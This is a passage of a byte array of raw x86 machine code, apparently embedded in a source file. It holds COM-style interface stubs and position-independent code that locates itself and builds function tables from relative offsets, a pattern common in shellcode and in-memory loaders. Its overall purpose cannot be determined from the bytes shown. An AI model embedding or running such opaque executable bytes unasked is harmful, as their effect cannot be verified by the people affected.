1411 0x2c, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45,
1412 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03,
1413 0x40, 0x00, 0x80, 0xe9, 0xc3, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b,
1414 0x40, 0x2c, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1415 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1416 0x14, 0x24, 0xe8, 0x68, 0x12, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b,
1417 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8d, 0x90, 0xb4, 0x08, 0x00, 0x00, 0xc7,
1418 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44,
1419 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x41, 0x12, 0x00, 0x00, 0x85, 0xc0,
1420 0x75, 0x1d, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45,
1421 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04,
1422 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x58, 0x8b, 0x45, 0xf4, 0x8b, 0x40,
1423 0x2c, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1424 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1425 0x24, 0xe8, 0xfd, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45,
1426 0xf4, 0x8d, 0x50, 0x08, 0x8b, 0x45, 0x10, 0x89, 0x10, 0x8b, 0x45, 0xf4,
1427 0x83, 0xc0, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x03, 0x00, 0x00, 0x83,
1428 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10,
1429 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9,
1430 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08,
1431 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf8,
1432 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10,
1433 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89,
1434 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45,
1435 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x55, 0xf4, 0xb8, 0x01,
1436 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1,
1437 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0xc9, 0xc2, 0x04,
1438 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x08, 0x89, 0x45,
1439 0xf4, 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x31, 0x83,
1440 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x62,
1441 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x04, 0x8b,
1442 0x55, 0xf4, 0x8b, 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1443 0x04, 0x8b, 0x45, 0xf4, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x18, 0x89, 0x10,
1444 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x83, 0x7d,
1445 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x27, 0x8b,
1446 0x45, 0xf4, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x04, 0x8b, 0x55, 0xf4, 0x83,
1447 0xc2, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45,
1448 0xf4, 0x8d, 0x50, 0x14, 0x8b, 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00,
1449 0x00, 0x00, 0xc9, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48,
1450 0xc7, 0x45, 0xd0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00,
1451 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1452 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
1453 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x40, 0x10, 0x00, 0x00,
1454 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x0c, 0x8d, 0x55, 0xd4, 0x89,
1455 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1456 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x2b, 0x8b,
1457 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x10, 0x8d, 0x55, 0xc8, 0x89, 0x54,
1458 0x24, 0x0c, 0x8d, 0x55, 0xcc, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0xd0,
1459 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0,
1460 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9,
1461 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08,
1462 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8b, 0x40, 0x4c,
1463 0xff, 0xd0, 0x8b, 0x55, 0x0c, 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00,
1464 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1465 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1466 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1467 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1468 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1469 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xe8, 0x65,
1470 0x0c, 0x00, 0x00, 0xba, 0x46, 0x55, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1471 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10,
1472 0xe8, 0x4b, 0x0c, 0x00, 0x00, 0xba, 0xd6, 0x55, 0x40, 0x00, 0xb9, 0x14,
1473 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1474 0x89, 0x50, 0x04, 0xe8, 0x30, 0x0c, 0x00, 0x00, 0xba, 0xfb, 0x55, 0x40,
1475 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1476 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x15, 0x0c, 0x00, 0x00, 0xba,
1477 0x28, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1478 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xfa, 0x0b,
1479 0x00, 0x00, 0xba, 0x34, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1480 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10,
1481 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1482 0x0c, 0x8b, 0x55, 0x08, 0x89, 0x50, 0x08, 0x90, 0xc9, 0xc3, 0x55, 0x89,
1483 0xe5, 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x07, 0xb8, 0x03,
1484 0x40, 0x00, 0x80, 0xeb, 0x79, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d,
1485 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00,
1486 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8,
1487 0x17, 0x0f, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b, 0x45, 0x08, 0x8b,
1488 0x40, 0x08, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1489 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1490 0x14, 0x24, 0xe8, 0xf0, 0x0e, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1d, 0x8b,
1491 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x04,
1492 0x24, 0xe8, 0x1c, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00,
1493 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
1494 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c, 0x00, 0x55, 0x89,
1495 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1496 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1,
1497 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1498 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89,
1499 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8,
1500 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45,
1501 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1502 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1503 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x53,
1504 0x81, 0xec, 0x24, 0x02, 0x00, 0x00, 0xe8, 0xc5, 0x0a, 0x00, 0x00, 0xba,
1505 0x0d, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1506 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10, 0xe8, 0xab, 0x0a, 0x00,
1507 0x00, 0xba, 0xb9, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1508 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x04, 0xe8,
1509 0x90, 0x0a, 0x00, 0x00, 0xba, 0xde, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61,
1510 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1511 0x50, 0x08, 0xe8, 0x75, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5b, 0x40, 0x00,
1512 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1513 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0x5a, 0x0a, 0x00, 0x00, 0xba, 0x2d,
1514 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1515 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10, 0xe8, 0x3f, 0x0a, 0x00,
1516 0x00, 0xba, 0x6d, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1517 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x14, 0xe8,
1518 0x24, 0x0a, 0x00, 0x00, 0xba, 0xa5, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61,
1519 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1520 0x50, 0x18, 0xe8, 0x09, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5c, 0x40, 0x00,
1521 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1522 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0xee, 0x09, 0x00, 0x00, 0xba, 0x17,
1523 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1524 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x20, 0xe8, 0xd3, 0x09, 0x00,
1525 0x00, 0xba, 0x23, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1526 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x24, 0xe8,
1527 0xb8, 0x09, 0x00, 0x00, 0xba, 0x2f, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1528 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1529 0x50, 0x28, 0xe8, 0x9d, 0x09, 0x00, 0x00, 0xba, 0x3b, 0x5c, 0x40, 0x00,
1530 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1531 0x8b, 0x00, 0x89, 0x50, 0x2c, 0xe8, 0x82, 0x09, 0x00, 0x00, 0xba, 0x47,
1532 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1533 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x30, 0xe8, 0x67, 0x09, 0x00,
1534 0x00, 0xba, 0x5d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1535 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x34, 0xe8,
1536 0x4c, 0x09, 0x00, 0x00, 0xba, 0x9d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1537 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1538 0x50, 0x38, 0xe8, 0x31, 0x09, 0x00, 0x00, 0xba, 0xa9, 0x5c, 0x40, 0x00,
1539 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1540 0x8b, 0x00, 0x89, 0x50, 0x3c, 0xe8, 0x16, 0x09, 0x00, 0x00, 0xba, 0xb5,
1541 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1542 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x40, 0xe8, 0xfb, 0x08, 0x00,
1543 0x00, 0xba, 0xc1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1544 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x44, 0xe8,
1545 0xe0, 0x08, 0x00, 0x00, 0xba, 0xcd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1546 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1547 0x50, 0x48, 0xe8, 0xc5, 0x08, 0x00, 0x00, 0xba, 0xd9, 0x5c, 0x40, 0x00,
1548 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1549 0x8b, 0x00, 0x89, 0x50, 0x4c, 0xe8, 0xaa, 0x08, 0x00, 0x00, 0xba, 0xe5,
1550 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1551 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x50, 0xe8, 0x8f, 0x08, 0x00,
1552 0x00, 0xba, 0xf1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1553 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x54, 0xe8,
1554 0x74, 0x08, 0x00, 0x00, 0xba, 0xfd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1555 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1556 0x50, 0x58, 0xe8, 0x59, 0x08, 0x00, 0x00, 0xba, 0x09, 0x5d, 0x40, 0x00,
1557 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1558 0x8b, 0x00, 0x89, 0x50, 0x5c, 0xe8, 0x3e, 0x08, 0x00, 0x00, 0xba, 0x15,
1559 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1560 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x60, 0xe8, 0x23, 0x08, 0x00,
1561 0x00, 0xba, 0x21, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1562 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x64, 0xe8,
1563 0x08, 0x08, 0x00, 0x00, 0xba, 0x44, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61,
1564 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1565 0x50, 0x68, 0xe8, 0xed, 0x07, 0x00, 0x00, 0xba, 0x50, 0x5d, 0x40, 0x00,
1566 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1567 0x8b, 0x00, 0x89, 0x50, 0x6c, 0xe8, 0xd2, 0x07, 0x00, 0x00, 0xba, 0x5c,
1568 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1569 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x70, 0xe8, 0xb7, 0x07, 0x00,
1570 0x00, 0xba, 0x68, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1571 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x74, 0x8b,
1572 0x45, 0x0c, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1573 0x8b, 0x55, 0x08, 0x89, 0x50, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0xed,
1574 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24,
1575 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
1576 0x73, 0xc0, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa4, 0x00, 0x00,
1577 0x00, 0x8b, 0x55, 0x0c, 0x83, 0xc2, 0x04, 0x89, 0x54, 0x24, 0x04, 0x8d,
1578 0x95, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1579 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x33, 0x8b, 0x45,
1580 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x18, 0x8b, 0x55, 0x0c,
1581 0x8d, 0x5a, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x94, 0x08, 0x00, 0x00,
1582 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x5c, 0x24, 0x08, 0x89, 0x4c,
1583 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45,
1584 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
1585 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40,
1586 0x00, 0x80, 0xe9, 0x92, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1587 0x14, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1588 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1589 0x24, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4e, 0x8b, 0x45,
1590 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x14, 0x08, 0x00, 0x00, 0xc7, 0x44,
1591 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
1592 0x04, 0x89, 0x14, 0x24, 0xe8, 0x26, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74,
1593 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x94, 0x08, 0x00,
1594 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1595 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0xff, 0x09, 0x00, 0x00,
1596 0x85, 0xc0, 0x75, 0x0f, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10,
1597 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00,
1598 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c,
1599 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0,
1600 0x10, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00,
1601 0xf0, 0x0f, 0xc1, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x10, 0xc9, 0xc2,
1602 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83,
1603 0xc0, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00,
1604 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01,
1605 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1606 0x89, 0xe5, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00,
1607 0x80, 0xeb, 0x0e, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1608 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5,
1609 0x83, 0xec, 0x18, 0x83, 0x7d, 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40,
1610 0x00, 0x80, 0xeb, 0x29, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00,
1611 0x8b, 0x40, 0x04, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24,
1612 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x08, 0x8b,
1613 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc2, 0x10,
1614 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1615 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08,
1616 0x8b, 0x4d, 0x1c, 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x14, 0x89, 0x4c,
1617 0x24, 0x08, 0x8b, 0x4d, 0x10, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24,
1618 0xff, 0xd0, 0x83, 0xec, 0x10, 0xc9, 0xc2, 0x18, 0x00, 0x55, 0x89, 0xe5,
1619 0x53, 0x83, 0xec, 0x44, 0x8b, 0x45, 0x18, 0x66, 0x89, 0x45, 0xe4, 0x8b,
1620 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x0f, 0xb7,
1621 0x4d, 0xe4, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x8b, 0x5d, 0x28, 0x89,
1622 0x5c, 0x24, 0x1c, 0x8b, 0x5d, 0x24, 0x89, 0x5c, 0x24, 0x18, 0x8b, 0x5d,
1623 0x20, 0x89, 0x5c, 0x24, 0x14, 0x8b, 0x5d, 0x1c, 0x89, 0x5c, 0x24, 0x10,
1624 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8b,
1625 0x4d, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1626 0xec, 0x20, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9,
1627 0xc2, 0x24, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1628 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1629 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1630 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1631 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1632 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x0c,
1633 0x66, 0x89, 0x45, 0xfc, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x08,
1634 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
